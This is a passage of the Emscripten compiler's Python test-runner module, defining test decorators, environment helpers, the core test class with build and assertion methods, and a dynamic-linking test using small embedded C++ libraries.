sys.path.append(__rootpath__)
import clang_native
import jsrun
import parallel_testsuite
from jsrun import NON_ZERO
from tools.shared import EM_CONFIG, TEMP_DIR, EMCC, EMXX, DEBUG
from tools.shared import LLVM_TARGET, ASM_JS_TARGET, EMSCRIPTEN_TEMP_DIR
from tools.shared import WASM_TARGET, SPIDERMONKEY_ENGINE, WINDOWS
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import asstr, get_canonical_temp_dir, run_process, try_delete
from tools.shared import asbytes, safe_copy, Settings
from tools import shared, line_endings, building
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
sys.path.append(path_from_root('third_party/websockify'))
logger = logging.getLogger(__file__)
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser. Setting '0' as the browser disables running a browser (but we still
# see tests compile)
EMTEST_BROWSER = os.getenv('EMTEST_BROWSER')
EMTEST_DETECT_TEMPFILE_LEAKS = int(os.getenv('EMTEST_DETECT_TEMPFILE_LEAKS', '0'))
# TODO(sbc): Remove this check for the legacy name once its been around for a while.
assert 'EM_SAVE_DIR' not in os.environ, "Please use EMTEST_SAVE_DIR instead of EM_SAVE_DIR"
EMTEST_SAVE_DIR = int(os.getenv('EMTEST_SAVE_DIR', '0'))
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = os.getenv('EMTEST_ALL_ENGINES')
EMTEST_SKIP_SLOW = os.getenv('EMTEST_SKIP_SLOW')
EMTEST_LACKS_NATIVE_CLANG = os.getenv('EMTEST_LACKS_NATIVE_CLANG')
EMTEST_VERBOSE = int(os.getenv('EMTEST_VERBOSE', '0'))
if EMTEST_VERBOSE:
logging.root.setLevel(logging.DEBUG)
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dlfcn(func):
assert callable(func)
@wraps(func)
def decorated(self):
self.check_dlfcn()
return func(self)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def no_wasm_backend(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note)
return decorated
def no_fastcomp(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm_backend', note, negate=True)
return decorated
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def no_asmjs(note=''):
assert not callable(note)
def decorated(f):
return skip_if(f, 'is_wasm', note, negate=True)
return decorated
def requires_native_clang(func):
assert callable(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
  # Setting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
def decorated(f):
def modified(self):
with env_modify(updates):
return f(self)
return modified
return decorated
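# A usage sketch for the decorator above (the variable names are examples taken
# from elsewhere in this file; a value of None clears the variable for the
# duration of the decorated test):
#   @with_env_modify({'EMCC_DEBUG': '1', 'EMCC_ALLOW_FASTCOMP': None})
#   def test_something(self):
#     ...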
@contextlib.contextmanager
def chdir(dir):
"""A context manager that performs actions in the given directory."""
orig_cwd = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(orig_cwd)
@contextlib.contextmanager
def js_engines_modify(replacements):
"""A context manager that updates shared.JS_ENGINES."""
original = shared.JS_ENGINES
shared.JS_ENGINES = replacements
try:
yield
finally:
shared.JS_ENGINES = original
@contextlib.contextmanager
def wasm_engines_modify(replacements):
"""A context manager that updates shared.WASM_ENGINES."""
original = shared.WASM_ENGINES
shared.WASM_ENGINES = replacements
try:
yield
finally:
shared.WASM_ENGINES = original
def ensure_dir(dirname):
if not os.path.isdir(dirname):
os.makedirs(dirname)
def limit_size(string, maxbytes=800000 * 20, maxlines=100000):
lines = string.splitlines()
if len(lines) > maxlines:
lines = lines[0:maxlines // 2] + ['[..]'] + lines[-maxlines // 2:]
string = '\n'.join(lines)
if len(string) > maxbytes:
string = string[0:maxbytes // 2] + '\n[..]\n' + string[-maxbytes // 2:]
return string
def create_test_file(name, contents, binary=False):
assert not os.path.isabs(name)
mode = 'wb' if binary else 'w'
with open(name, mode) as f:
f.write(contents)
# The core test modes
core_test_modes = [
'wasm0',
'wasm1',
'wasm2',
'wasm3',
'wasms',
'wasmz',
'strict'
]
if Settings.WASM_BACKEND:
core_test_modes += [
'wasm2js0',
'wasm2js1',
'wasm2js2',
'wasm2js3',
'wasm2jss',
'wasm2jsz',
]
else:
core_test_modes += [
'asm0',
'asm2',
'asm3',
'asm2g',
'asm2f',
]
# The default core test mode, used when none is specified
default_core_test_mode = 'wasm0'
# The non-core test modes
non_core_test_modes = [
'other',
'browser',
'sanity',
'sockets',
'interactive',
'benchmark',
]
if Settings.WASM_BACKEND:
non_core_test_modes += [
'asan',
'lsan',
'wasm2ss',
]
def parameterized(parameters):
"""
Mark a test as parameterized.
Usage:
@parameterized({
'subtest1': (1, 2, 3),
'subtest2': (4, 5, 6),
})
def test_something(self, a, b, c):
... # actual test body
This is equivalent to defining two tests:
def test_something_subtest1(self):
# runs test_something(1, 2, 3)
def test_something_subtest2(self):
# runs test_something(4, 5, 6)
"""
def decorator(func):
func._parameterize = parameters
return func
return decorator
class RunnerMeta(type):
@classmethod
def make_test(mcs, name, func, suffix, args):
"""
This is a helper function to create new test functions for each parameterized form.
:param name: the original name of the function
:param func: the original function that we are parameterizing
:param suffix: the suffix to append to the name of the function for this parameterization
:param args: the positional arguments to pass to the original function for this parameterization
:returns: a tuple of (new_function_name, new_function_object)
"""
# Create the new test function. It calls the original function with the specified args.
# We use @functools.wraps to copy over all the function attributes.
@wraps(func)
def resulting_test(self):
return func(self, *args)
# Add suffix to the function name so that it displays correctly.
if suffix:
resulting_test.__name__ = '%s_%s' % (name, suffix)
else:
resulting_test.__name__ = name
# On python 3, functions have __qualname__ as well. This is a full dot-separated path to the function.
# We add the suffix to it as well.
if hasattr(func, '__qualname__'):
resulting_test.__qualname__ = '%s_%s' % (func.__qualname__, suffix)
return resulting_test.__name__, resulting_test
def __new__(mcs, name, bases, attrs):
# This metaclass expands parameterized methods from `attrs` into separate ones in `new_attrs`.
new_attrs = {}
for attr_name, value in attrs.items():
# Check if a member of the new class has _parameterize, the tag inserted by @parameterized.
if hasattr(value, '_parameterize'):
# If it does, we extract the parameterization information, build new test functions.
for suffix, args in value._parameterize.items():
new_name, func = mcs.make_test(attr_name, value, suffix, args)
assert new_name not in new_attrs, 'Duplicate attribute name generated when parameterizing %s' % attr_name
new_attrs[new_name] = func
else:
# If not, we just copy it over to new_attrs verbatim.
assert attr_name not in new_attrs, '%s collided with an attribute from parameterization' % attr_name
new_attrs[attr_name] = value
# We invoke type, the default metaclass, to actually create the new class, with new_attrs.
return type.__new__(mcs, name, bases, new_attrs)
# This is a hack to make the metaclass work on both python 2 and python 3.
#
# On python 3, the code should be:
# class RunnerCore(unittest.TestCase, metaclass=RunnerMeta):
# ...
#
# On python 2, the code should be:
# class RunnerCore(unittest.TestCase):
# __metaclass__ = RunnerMeta
# ...
#
# To be compatible with both python 2 and python 3, we create a class by directly invoking the
# metaclass, which is done in the same way on both python 2 and 3, and inherit from it,
# since a class inherits the metaclass by default.
class RunnerCore(RunnerMeta('TestCase', (unittest.TestCase,), {})):
# default temporary directory settings. set_temp_dir may be called later to
# override these
temp_dir = TEMP_DIR
canonical_temp_dir = get_canonical_temp_dir(TEMP_DIR)
# This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
stderr_redirect = STDOUT
def is_wasm(self):
return self.get_setting('WASM') != 0
def is_wasm_backend(self):
return self.get_setting('WASM_BACKEND')
def check_dlfcn(self):
if self.get_setting('ALLOW_MEMORY_GROWTH') == 1 and not self.is_wasm():
self.skipTest('no dlfcn with memory growth (without wasm)')
if self.get_setting('WASM_BACKEND') and not self.get_setting('WASM'):
self.skipTest('no dynamic library support in wasm2js yet')
if '-fsanitize=address' in self.emcc_args:
self.skipTest('no dynamic library support in asan yet')
def uses_memory_init_file(self):
if self.get_setting('SIDE_MODULE') or \
(self.get_setting('WASM') and not self.get_setting('WASM2JS')):
return False
elif '--memory-init-file' in self.emcc_args:
return int(self.emcc_args[self.emcc_args.index('--memory-init-file') + 1])
else:
# side modules handle memory differently; binaryen puts the memory in the wasm module
opt_supports = any(opt in self.emcc_args for opt in ('-O2', '-O3', '-Os', '-Oz'))
return opt_supports
def set_temp_dir(self, temp_dir):
self.temp_dir = temp_dir
self.canonical_temp_dir = get_canonical_temp_dir(self.temp_dir)
# Explicitly set dedicated temporary directory for parallel tests
os.environ['EMCC_TEMP_DIR'] = self.temp_dir
@classmethod
def setUpClass(cls):
super(RunnerCore, cls).setUpClass()
print('(checking sanity from test runner)') # do this after we set env stuff
shared.check_sanity(force=True)
def setUp(self):
super(RunnerCore, self).setUp()
self.settings_mods = {}
self.emcc_args = ['-Werror']
self.env = {}
self.temp_files_before_run = []
if not Settings.WASM_BACKEND:
os.environ['EMCC_ALLOW_FASTCOMP'] = '1'
if EMTEST_DETECT_TEMPFILE_LEAKS:
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
self.temp_files_before_run.append(os.path.normpath(os.path.join(root, filename)))
self.banned_js_engines = []
self.use_all_engines = EMTEST_ALL_ENGINES
if EMTEST_SAVE_DIR:
self.working_dir = os.path.join(self.temp_dir, 'emscripten_test')
if os.path.exists(self.working_dir):
if EMTEST_SAVE_DIR == 2:
print('Not clearing existing test directory')
else:
print('Clearing existing test directory')
          # Even when EMTEST_SAVE_DIR is set we still try to start with an empty directory as many tests
          # expect this. EMTEST_SAVE_DIR=2 can be used to keep the old contents for the new test
          # run. This can be useful when iterating on a given test with extra files you want to keep
          # around in the output directory.
delete_contents(self.working_dir)
else:
print('Creating new test output directory')
ensure_dir(self.working_dir)
else:
self.working_dir = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=self.temp_dir)
os.chdir(self.working_dir)
if not EMTEST_SAVE_DIR:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not EMTEST_SAVE_DIR:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.dirname(self.get_dir()))
try_delete(self.get_dir())
if EMTEST_DETECT_TEMPFILE_LEAKS and not os.environ.get('EMCC_DEBUG'):
temp_files_after_run = []
for root, dirnames, filenames in os.walk(self.temp_dir):
for dirname in dirnames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, dirname)))
for filename in filenames:
temp_files_after_run.append(os.path.normpath(os.path.join(root, filename)))
# Our leak detection will pick up *any* new temp files in the temp dir.
# They may not be due to us, but e.g. the browser when running browser
# tests. Until we figure out a proper solution, ignore some temp file
# names that we see on our CI infrastructure.
ignorable_file_prefixes = [
'/tmp/tmpaddon',
'/tmp/circleci-no-output-timeout',
'/tmp/wasmer'
]
left_over_files = set(temp_files_after_run) - set(self.temp_files_before_run)
left_over_files = [f for f in left_over_files if not any([f.startswith(prefix) for prefix in ignorable_file_prefixes])]
if len(left_over_files):
print('ERROR: After running test, there are ' + str(len(left_over_files)) + ' new temporary files/directories left behind:', file=sys.stderr)
for f in left_over_files:
print('leaked file: ' + f, file=sys.stderr)
self.fail('Test leaked ' + str(len(left_over_files)) + ' temporary files!')
def get_setting(self, key):
if key in self.settings_mods:
return self.settings_mods[key]
return Settings[key]
def set_setting(self, key, value=1):
if value is None:
self.clear_setting(key)
self.settings_mods[key] = value
def has_changed_setting(self, key):
return key in self.settings_mods
def clear_setting(self, key):
self.settings_mods.pop(key, None)
def serialize_settings(self):
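    # e.g. settings_mods of {'WASM': 1, 'EXPORTED_FUNCTIONS': ['_main']} (the
    # setting names here are only illustrative) serializes to
    # ['-s', 'WASM', '-s', 'EXPORTED_FUNCTIONS=["_main"]']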
ret = []
for key, value in self.settings_mods.items():
if value == 1:
ret += ['-s', key]
else:
ret += ['-s', '{}={}'.format(key, json.dumps(value))]
return ret
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def add_pre_run(self, code):
create_test_file('prerun.js', 'Module.preRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'prerun.js']
def add_post_run(self, code):
create_test_file('postrun.js', 'Module.postRun = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'postrun.js']
def add_on_exit(self, code):
create_test_file('onexit.js', 'Module.onExit = function() { %s }' % code)
self.emcc_args += ['--pre-js', 'onexit.js']
def prep_ll_file(self, output_file, input_file, force_recompile=False, build_ll_hook=None):
# force_recompile = force_recompile or os.path.getsize(filename + '.ll') > 50000
# If the file is big, recompile just to get ll_opts
# Recompiling just for dfe in ll_opts is too costly
def fix_target(ll_filename):
if LLVM_TARGET == ASM_JS_TARGET:
return
with open(ll_filename) as f:
contents = f.read()
if LLVM_TARGET in contents:
return
asmjs_layout = "e-p:32:32-i64:64-v128:32:128-n32-S128"
wasm_layout = "e-m:e-p:32:32-i64:64-n32:64-S128"
assert(ASM_JS_TARGET in contents)
assert(asmjs_layout in contents)
contents = contents.replace(asmjs_layout, wasm_layout)
contents = contents.replace(ASM_JS_TARGET, WASM_TARGET)
with open(ll_filename, 'w') as f:
f.write(contents)
output_obj = output_file + '.o'
output_ll = output_file + '.ll'
if force_recompile or build_ll_hook:
if input_file.endswith(('.bc', '.o')):
if input_file != output_obj:
shutil.copy(input_file, output_obj)
building.llvm_dis(output_obj, output_ll)
else:
shutil.copy(input_file, output_ll)
fix_target(output_ll)
if build_ll_hook:
need_post = build_ll_hook(output_file)
building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.pre') # for comparisons later
building.llvm_dis(output_obj, output_ll)
if build_ll_hook and need_post:
build_ll_hook(output_file)
building.llvm_as(output_ll, output_obj)
shutil.move(output_ll, output_ll + '.post') # for comparisons later
building.llvm_dis(output_obj, output_ll)
building.llvm_as(output_ll, output_obj)
else:
if input_file.endswith('.ll'):
safe_copy(input_file, output_ll)
fix_target(output_ll)
building.llvm_as(output_ll, output_obj)
else:
safe_copy(input_file, output_obj)
return output_obj
# returns the full list of arguments to pass to emcc
# param @main_file whether this is the main file of the test. some arguments
# (like --pre-js) do not need to be passed when building
# libraries, for example
def get_emcc_args(self, main_file=False):
args = self.serialize_settings() + self.emcc_args
if not main_file:
for i, arg in enumerate(args):
if arg in ('--pre-js', '--post-js'):
args[i] = None
args[i + 1] = None
args = [arg for arg in args if arg is not None]
return args
# Build JavaScript code from source code
def build(self, src, dirname, filename, main_file=None,
additional_files=[], libraries=[], includes=[], build_ll_hook=None,
post_build=None, js_outfile=True):
# Copy over necessary files for compiling the source
if main_file is None:
with open(filename, 'w') as f:
f.write(src)
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = [os.path.join(dirname, f) for f in additional_files]
os.chdir(self.get_dir())
suffix = '.o.js' if js_outfile else '.o.wasm'
all_sources = [filename] + additional_files
if any(os.path.splitext(s)[1] in ('.cc', '.cxx', '.cpp') for s in all_sources):
compiler = EMXX
else:
compiler = EMCC
if build_ll_hook:
# "slow", old path: build to bc, then build to JS
# C++ => LLVM binary
for f in all_sources:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except OSError:
pass
args = [compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
['-c', f, '-o', f + '.o']
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(f + '.o')
# Link all files
object_file = filename + '.o'
if len(additional_files) + len(libraries):
shutil.move(object_file, object_file + '.alone')
inputs = [object_file + '.alone'] + [f + '.o' for f in additional_files] + libraries
building.link_to_object(inputs, object_file)
if not os.path.exists(object_file):
print("Failed to link LLVM binaries:\n\n", object_file)
self.fail("Linkage error")
# Finalize
self.prep_ll_file(filename, object_file, build_ll_hook=build_ll_hook)
# BC => JS
building.emcc(object_file, self.get_emcc_args(main_file=True), object_file + '.js')
else:
# "fast", new path: just call emcc and go straight to JS
all_files = all_sources + libraries
args = [compiler] + self.get_emcc_args(main_file=True) + \
['-I' + dirname, '-I' + os.path.join(dirname, 'include')] + \
['-I' + include for include in includes] + \
all_files + ['-o', filename + suffix]
run_process(args, stderr=self.stderr_redirect if not DEBUG else None)
self.assertExists(filename + suffix)
if post_build:
post_build(filename + suffix)
if js_outfile and self.uses_memory_init_file():
src = open(filename + suffix).read()
# side memory init file, or an empty one in the js
assert ('/* memory initializer */' not in src) or ('/* memory initializer */ allocate([]' in src)
def validate_asmjs(self, err):
# check for asm.js validation
if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err:
print("[was asm.js'ified]", file=sys.stderr)
# check for an asm.js validation error, if we expect one
elif 'asm.js' in err and not self.is_wasm() and self.get_setting('ASM_JS') == 1:
self.fail("did NOT asm.js'ify: " + err)
err = '\n'.join([line for line in err.split('\n') if 'uccessfully compiled asm.js code' not in line])
return err
def get_func(self, src, name):
start = src.index('function ' + name + '(')
t = start
n = 0
while True:
if src[t] == '{':
n += 1
elif src[t] == '}':
n -= 1
if n == 0:
return src[start:t + 1]
t += 1
assert t < len(src)
def count_funcs(self, javascript_file):
num_funcs = 0
start_tok = "// EMSCRIPTEN_START_FUNCS"
end_tok = "// EMSCRIPTEN_END_FUNCS"
start_off = 0
end_off = 0
with open(javascript_file, 'rt') as f:
blob = "".join(f.readlines())
start_off = blob.find(start_tok) + len(start_tok)
end_off = blob.find(end_tok)
asm_chunk = blob[start_off:end_off]
num_funcs = asm_chunk.count('function ')
return num_funcs
def count_wasm_contents(self, wasm_binary, what):
out = run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), wasm_binary, '--metrics'], stdout=PIPE).stdout
# output is something like
# [?] : 125
for line in out.splitlines():
if '[' + what + ']' in line:
ret = line.split(':')[1].strip()
return int(ret)
self.fail('Failed to find [%s] in wasm-opt output' % what)
def get_wasm_text(self, wasm_binary):
return run_process([os.path.join(building.get_binaryen_bin(), 'wasm-dis'), wasm_binary], stdout=PIPE).stdout
def is_exported_in_wasm(self, name, wasm):
wat = self.get_wasm_text(wasm)
return ('(export "%s"' % name) in wat
def run_js(self, filename, engine=None, args=[], output_nicerizer=None, assert_returncode=0):
# use files, as PIPE can get too full and hang us
stdout = self.in_dir('stdout')
stderr = self.in_dir('stderr')
# Make sure that we produced proper line endings to the .js file we are about to run.
if not filename.endswith('.wasm'):
self.assertEqual(line_endings.check_line_endings(filename), 0)
error = None
if EMTEST_VERBOSE:
print("Running '%s' under '%s'" % (filename, engine))
try:
jsrun.run_js(filename, engine, args,
stdout=open(stdout, 'w'),
stderr=open(stderr, 'w'),
assert_returncode=assert_returncode)
except subprocess.CalledProcessError as e:
error = e
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and self.get_setting('ASM_JS') == 1:
err = self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
if error or EMTEST_VERBOSE:
print('-- begin program output --')
print(ret, end='')
print('-- end program output --')
if error:
if assert_returncode == NON_ZERO:
self.fail('JS subprocess unexpectedly succeeded (%s): Output:\n%s' % (error.cmd, ret))
else:
self.fail('JS subprocess failed (%s): %s. Output:\n%s' % (error.cmd, error.returncode, ret))
# We should pass all strict mode checks
self.assertNotContained('strict warning:', ret)
return ret
def assertExists(self, filename, msg=None):
if not msg:
msg = 'Expected file not found: ' + filename
self.assertTrue(os.path.exists(filename), msg)
def assertNotExists(self, filename, msg=None):
if not msg:
msg = 'Unexpected file exists: ' + filename
self.assertFalse(os.path.exists(filename), msg)
# Tests that the given two paths are identical, modulo path delimiters. E.g. "C:/foo" is equal to "C:\foo".
def assertPathsIdentical(self, path1, path2):
path1 = path1.replace('\\', '/')
path2 = path2.replace('\\', '/')
return self.assertIdentical(path1, path2)
# Tests that the given two multiline text content are identical, modulo line
# ending differences (\r\n on Windows, \n on Unix).
def assertTextDataIdentical(self, text1, text2, msg=None,
fromfile='expected', tofile='actual'):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertIdentical(text1, text2, msg, fromfile, tofile)
def assertIdentical(self, values, y, msg=None,
fromfile='expected', tofile='actual'):
if type(values) not in (list, tuple):
values = [values]
for x in values:
if x == y:
return # success
diff_lines = difflib.unified_diff(x.splitlines(), y.splitlines(),
fromfile=fromfile, tofile=tofile)
diff = ''.join([a.rstrip() + '\n' for a in diff_lines])
if EMTEST_VERBOSE:
print("Expected to have '%s' == '%s'" % (limit_size(values[0]), limit_size(y)))
fail_message = 'Unexpected difference:\n' + limit_size(diff)
if not EMTEST_VERBOSE:
fail_message += '\nFor full output run with EMTEST_VERBOSE=1.'
if msg:
fail_message += '\n' + msg
self.fail(fail_message)
def assertIdenticalUrlEncoded(self, expected, actual, **kwargs):
"""URL decodes the `actual` parameter before checking for equality."""
self.assertIdentical(expected, unquote(actual), **kwargs)
def assertTextDataContained(self, text1, text2):
text1 = text1.replace('\r\n', '\n')
text2 = text2.replace('\r\n', '\n')
return self.assertContained(text1, text2)
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]:
values = [values]
values = list(map(asstr, values))
if callable(string):
string = string()
if not any(v in string for v in values):
diff = difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')
diff = ''.join(a.rstrip() + '\n' for a in diff)
self.fail("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string), limit_size(diff),
additional_info
))
def assertNotContained(self, value, string):
if callable(value):
value = value() # lazy loading
if callable(string):
string = string()
if value in string:
self.fail("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip() + '\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContainedIf(self, value, string, condition):
if condition:
self.assertContained(value, string)
else:
self.assertNotContained(value, string)
def assertBinaryEqual(self, file1, file2):
self.assertEqual(os.path.getsize(file1),
os.path.getsize(file2))
self.assertEqual(open(file1, 'rb').read(),
open(file2, 'rb').read())
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
ensure_dir(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'],
configure_args=[], make=['make'], make_args=None,
env_init={}, cache_name_extra='', native=False):
if make_args is None:
make_args = ['-j', str(building.get_num_cores())]
build_dir = self.get_build_dir()
output_dir = self.get_dir()
emcc_args = self.get_emcc_args()
hash_input = (str(emcc_args) + ' $ ' + str(env_init)).encode('utf-8')
cache_name = name + ','.join([opt for opt in emcc_args if len(opt) < 7]) + '_' + hashlib.md5(hash_input).hexdigest() + cache_name_extra
valid_chars = "_%s%s" % (string.ascii_letters, string.digits)
cache_name = ''.join([(c if c in valid_chars else '_') for c in cache_name])
if self.library_cache.get(cache_name):
print('<load %s from cache> ' % cache_name, file=sys.stderr)
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
with open(bc_file, 'wb') as f:
f.write(contents)
generated_libs.append(bc_file)
return generated_libs
print('<building and saving %s into cache> ' % cache_name, file=sys.stderr)
return build_library(name, build_dir, output_dir, generated_libs, configure,
configure_args, make, make_args, self.library_cache,
cache_name, env_init=env_init, native=native, cflags=self.get_emcc_args())
def clear(self):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name))
if EMSCRIPTEN_TEMP_DIR:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def expect_fail(self, cmd, **args):
"""Run a subprocess and assert that it returns non-zero.
Return the stderr of the subprocess.
"""
proc = run_process(cmd, check=False, stderr=PIPE, **args)
self.assertNotEqual(proc.returncode, 0, 'subprocess unexpectedly succeeded. stderr:\n' + proc.stderr)
# When we check for failure we expect a user-visible error, not a traceback.
# However, on windows a python traceback can happen randomly sometimes,
# due to "Access is denied" https://github.com/emscripten-core/emscripten/issues/718
if not WINDOWS or 'Access is denied' not in proc.stderr:
self.assertNotContained('Traceback', proc.stderr)
return proc.stderr
def setup_runtimelink_test(self):
create_test_file('header.h', r'''
struct point
{
int x, y;
};
''')
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
create_test_file('supp.cpp', supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
REPORT_RESULT(suppInt);
#endif
return 0;
}
'''
return (main, supp)
# exercise the dynamic linker.
#
# test that linking to shared library B, which is linked to A, loads A as well.
# main is also linked to C, which is also linked to A. A is loaded/initialized only once.
#
# B
# main < > A
# C
#
# this test is used by both test_core and test_browser.
# when run in the browser it exercises how the dynamic linker handles concurrency
# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
create_test_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
create_test_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
# _test_dylink_dso_needed can be potentially called several times by a test.
# reset dylink-related options first.
self.clear_setting('MAIN_MODULE')
self.clear_setting('SIDE_MODULE')
self.clear_setting('RUNTIME_LINKED_LIBS')
# XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
so = '.wasm' if self.is_wasm() else '.js'
def ccshared(src, linkto=[]):
cmdv = [EMCC, src, '-o', os.path.splitext(src)[0] + so] + self.get_emcc_args()
cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
run_process(cmdv)
ccshared('liba.cpp')
ccshared('libb.cpp', ['liba' + so])
ccshared('libc.cpp', ['liba' + so])
self.set_setting('MAIN_MODULE', 1)
self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
do_run(r'''
extern "C" {
void bfunc();
void cfunc();
}
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
self.set_setting('RUNTIME_LINKED_LIBS', [])
for libname in ['liba', 'libb', 'libc']:
self.emcc_args += ['--embed-file', libname + so]
do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
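# Each engine is an argument list (executable plus flags); banned_js_engines
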